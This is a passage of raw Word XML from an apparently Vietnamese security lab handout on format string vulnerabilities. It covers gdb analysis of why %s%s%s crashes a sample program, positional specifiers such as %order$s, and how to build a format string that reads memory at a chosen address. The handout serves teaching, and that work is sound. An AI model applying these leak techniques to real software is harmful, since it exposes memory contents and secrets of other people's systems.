                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65108477" w14:textId="0C554A51" w:rsidR="00B07CC0" w:rsidRPr="00B07CC0" w:rsidRDefault="00B07CC0" w:rsidP="00C540F8">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giải thích kết quả với gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35176945" w14:textId="2BD8E4DB" w:rsidR="00B07CC0" w:rsidRDefault="00B07CC0" w:rsidP="00B07CC0">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phân tích chương trình với gdb để lý giải kết quả lỗi ở Bước 1. Mở </w:t>
      </w:r>
      <w:r w:rsidR="00CB02E5">
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:t>-leak với gdb, đặt breakpoint tại printf thứ 2, sau đó chạy và truyền vào chuỗi %s</w:t>
      </w:r>
      <w:r w:rsidR="00B20DDE">
        <w:t>%s</w:t>
      </w:r>
      <w:r w:rsidR="008A270B">
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA4950" w14:textId="7C2420D7" w:rsidR="00B07CC0" w:rsidRPr="006A1BF7" w:rsidRDefault="00876161" w:rsidP="00B20DDE">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110CC714" wp14:editId="71B6D07C">
            <wp:extent cx="2904775" cy="661706"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2947153" cy="671360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D075F21" w14:textId="464797CC" w:rsidR="00464132" w:rsidRDefault="00464132" w:rsidP="00B07CC0">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464132">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Có thể thấy rằng</w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, với lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00464132">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> printf </w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>thứ 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00464132">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00876161">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00534F64">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>giá trị tại địa chỉ</w:t>
      </w:r>
      <w:r w:rsidRPr="00464132">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534F64" w:rsidRPr="00A53C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00876161">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d134,</w:t>
      </w:r>
      <w:r w:rsidR="00534F64">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534F64" w:rsidRPr="00A53C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00876161">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d138, 0xffffd13c</w:t>
      </w:r>
      <w:r w:rsidRPr="00464132">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00534F64">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lần lượt là</w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> tham số dành cho</w:t>
      </w:r>
      <w:r w:rsidR="00534F64">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00342577">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00534F64">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> format</w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s, </w:t>
      </w:r>
      <w:r w:rsidR="007A08C3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>được mong đợi</w:t>
      </w:r>
      <w:r w:rsidR="00B07CC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> là địa chỉ chứa chuỗi cần in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA9263" w14:textId="36269DA0" w:rsidR="00534F64" w:rsidRDefault="00876161" w:rsidP="00534F64">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0279C5AA" wp14:editId="64801BE1">
            <wp:extent cx="4668579" cy="1243486"/>
            <wp:effectExtent l="0" t="0" r="0" b="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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686644" cy="1248298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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46885" w14:paraId="735023F5" w14:textId="77777777" w:rsidTr="004908CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="022C29E7" w14:textId="0737E81D" w:rsidR="00B46885" w:rsidRPr="002742AF" w:rsidRDefault="002742AF" w:rsidP="002742AF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Giải thích vì sao %s%s%s gây lỗi chương trình?</w:t>
            </w:r>
            <w:r w:rsidR="00B46885" w:rsidRPr="00B46885">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CD49686" w14:textId="5A3230C2" w:rsidR="006A1BF7" w:rsidRDefault="006A1BF7" w:rsidP="00EE0067">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đổi chuỗi định dạng %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17132550" w14:textId="251C0B44" w:rsidR="00326CA4" w:rsidRDefault="0058009D" w:rsidP="006A1BF7">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00D609DB">
        <w:t>Ngoài ra</w:t>
      </w:r>
      <w:r w:rsidR="003B3E63">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609DB">
        <w:t xml:space="preserve"> ta cũng có thể chỉ định </w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:t>thứ tự</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609DB">
        <w:t xml:space="preserve"> tham số trên ngăn xếp được xuất ra dưới dạng chuỗi </w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:t>với %s</w:t>
      </w:r>
      <w:r w:rsidR="003B3E63">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B355F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D609DB">
        <w:t xml:space="preserve">Ví dụ ta chỉ định tham số thứ </w:t>
      </w:r>
      <w:r w:rsidR="00371390">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609DB">
        <w:t xml:space="preserve"> của printf như sau, </w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:t>có thể thấy chương trình cũng bị lỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609DB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0077513A">
        <w:t xml:space="preserve"> Do vậy, cần cẩn thận khi dùng %s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B66CCE" w14:textId="343B5A78" w:rsidR="006928E9" w:rsidRPr="006928E9" w:rsidRDefault="0077513A" w:rsidP="00895CEE">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640A7F1D" wp14:editId="7998655D">
            <wp:extent cx="3872471" cy="942139"/>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30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3917356" cy="953059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16FB7B" w14:textId="2E4BEC8B" w:rsidR="00FB7D9D" w:rsidRPr="00410545" w:rsidRDefault="00FB7D9D" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng %x để lấy </w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>giá trị dạng hexan trong stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>, nhưng nên sử dụng %p</w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> nếu muốn các giá trị in ra dạng hexan </w:t>
      </w:r>
      <w:r w:rsidR="00895CEE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>vừa đủ số bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA871B" w14:textId="33A4EE2A" w:rsidR="00FB7D9D" w:rsidRPr="00410545" w:rsidRDefault="00FB7D9D" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00B17B0C" w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">%s để lấy </w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>đọc chuỗi từ 1 tham số</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> địa chỉ,</w:t>
      </w:r>
      <w:r w:rsidR="00374DDB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép đọc hết chuỗi cho đến khi gặp ký tự NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F3F4E" w14:textId="5F887D01" w:rsidR="00C540F8" w:rsidRPr="00895CEE" w:rsidRDefault="00FB7D9D" w:rsidP="00895CEE">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00CB7F75" w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>%order</w:t>
      </w:r>
      <w:r w:rsidR="00410545" w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>x để nhận giá trị của tham số được chỉ định và sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00410545" w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">s để </w:t>
      </w:r>
      <w:r w:rsidR="009B15B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>đọc chuỗi từ</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00CA3599">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>đa</w:t>
      </w:r>
      <w:r w:rsidR="002B28EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00CA3599">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>g lưu trong</w:t>
      </w:r>
      <w:r w:rsidRPr="00410545">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> tham số đã chỉ định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A039C4" w14:textId="3F541B46" w:rsidR="00A21F98" w:rsidRDefault="00681FC1" w:rsidP="00583F06">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc dữ liệu từ địa chỉ</w:t>
      </w:r>
      <w:r w:rsidR="00A21F98">
        <w:t xml:space="preserve"> tùy ý</w:t>
      </w:r>
      <w:r w:rsidR="00A21F98">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A113B0E" w14:textId="5889A10A" w:rsidR="00E01D83" w:rsidRDefault="00EF65AD" w:rsidP="00C12195">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF65AD">
        <w:t xml:space="preserve">Có thể thấy rằng ở phần trên, </w:t>
      </w:r>
      <w:r w:rsidR="00681FC1">
        <w:t xml:space="preserve">dù có thể đọc nhiều </w:t>
      </w:r>
      <w:r w:rsidR="00D2013B">
        <w:t>giá trị</w:t>
      </w:r>
      <w:r w:rsidR="00681FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005866E2">
        <w:t>của các ô nhớ liên tục</w:t>
      </w:r>
      <w:r w:rsidR="00681FC1">
        <w:t xml:space="preserve"> hoặc 1 </w:t>
      </w:r>
      <w:r w:rsidR="005866E2">
        <w:t>ô nhớ</w:t>
      </w:r>
      <w:r w:rsidR="00681FC1">
        <w:t xml:space="preserve"> được chỉ định đang lưu trên stack, chúng ta gần như không quan tâm đến địa chỉ của </w:t>
      </w:r>
      <w:r w:rsidR="001E781B">
        <w:t>ô nhớ</w:t>
      </w:r>
      <w:r w:rsidR="00681FC1">
        <w:t xml:space="preserve"> là ở đâu. Đọc dữ liệu như vậy cũng khá hữu ích, nhưng chưa hiệu quả</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF65AD">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidR="00EF3911">
        <w:t>Đôi khi ta sẽ cần đọc dữ liệu từ 1 địa chỉ xác định</w:t>
      </w:r>
      <w:r w:rsidR="00D2797E">
        <w:t xml:space="preserve"> nào đó mà việc tính toán thứ tự tham số so với printf dường như không thể</w:t>
      </w:r>
      <w:r w:rsidR="00EF3911">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EF3911">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Vậy thì làm sao có thể làm điều này?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F3CF5B" w14:textId="1FCBC971" w:rsidR="00DA4216" w:rsidRPr="00DA4216" w:rsidRDefault="00DA4216" w:rsidP="00C12195">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Ta có thể thực hiện điều này với format %s, khi đó ta chỉ cần cung cấp địa chỉ của vùng nhớ muốn đọc dữ liệu, và để các hàm đọc (như printf) làm công việc còn lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E8676" w14:textId="28AD22FA" w:rsidR="001B4D31" w:rsidRDefault="006F7F48" w:rsidP="00E01D83">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658242" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61F98395" wp14:editId="053DD256">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2747645</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45854</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3460115" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="6985" b="889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31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4735" t="4507" r="3293" b="3536"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3460115" cy="239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D31">
        <w:t xml:space="preserve">Để </w:t>
      </w:r>
      <w:r w:rsidR="00DA4216">
        <w:t>xây dựng chuỗi định dạng làm được điều này</w:t>
      </w:r>
      <w:r w:rsidR="001B4D31">
        <w:t>, ta cần</w:t>
      </w:r>
      <w:r w:rsidR="00E4589D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56726F2A" w14:textId="2ED1260A" w:rsidR="001B4D31" w:rsidRDefault="001B4D31" w:rsidP="001B4D31">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Xác định địa chỉ cụ thể của vùng nhớ muốn đọc dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00E4589D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038AA641" w14:textId="24DA3DDA" w:rsidR="001B4D31" w:rsidRDefault="001B4D31" w:rsidP="001B4D31">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đưa địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00C12195">
        <w:t>này</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vào chuỗi định dạng sẽ dùng để khai thác, nên đặt ở đầu chuỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DE710" w14:textId="197FD7E1" w:rsidR="001B4D31" w:rsidRDefault="00971DF9" w:rsidP="001B4D31">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Xác định chuỗi định dạng</w:t>
      </w:r>
      <w:r w:rsidR="00DA4216">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">có sử dụng %s, tuy nhiên cần đảm bảo </w:t>
      </w:r>
      <w:r w:rsidR="001B4D31">
        <w:t xml:space="preserve">printf có thể ánh xạ địa chỉ đã thêm </w:t>
      </w:r>
      <w:r w:rsidR="00D04E2D">
        <w:t xml:space="preserve">là tham số sẽ dùng </w:t>
      </w:r>
      <w:r w:rsidR="001B4D31">
        <w:t>với format %s khi đọc dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77837AAD" w14:textId="0E4D7397" w:rsidR="00E4589D" w:rsidRDefault="00B779E4" w:rsidP="00971DF9">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Có thể tham khảo ý tưởng như hình bên</w:t>
      </w:r>
      <w:r w:rsidR="00971DF9">
        <w:t>, sử dụng nhiều %x trung gian để %s được dùng với tham số tương ứng là địa chỉ 0x080456AB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E125E50" w14:textId="1CFD023D" w:rsidR="00B779E4" w:rsidRPr="00D04E2D" w:rsidRDefault="00BF2223" w:rsidP="00BF2223">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Xác định </w:t>
      </w:r>
      <w:r w:rsidR="00B779E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vùng nhớ cần đọc dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C4AB2" w14:textId="0E0F62D2" w:rsidR="00B63429" w:rsidRDefault="00B63429" w:rsidP="00B63429">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Có thể lấy địa chỉ từ thông tin </w:t>
      </w:r>
      <w:r w:rsidR="00F02150">
        <w:t xml:space="preserve">trích xuất </w:t>
      </w:r>
      <w:r>
        <w:t>được từ file thực thi.</w:t>
      </w:r>
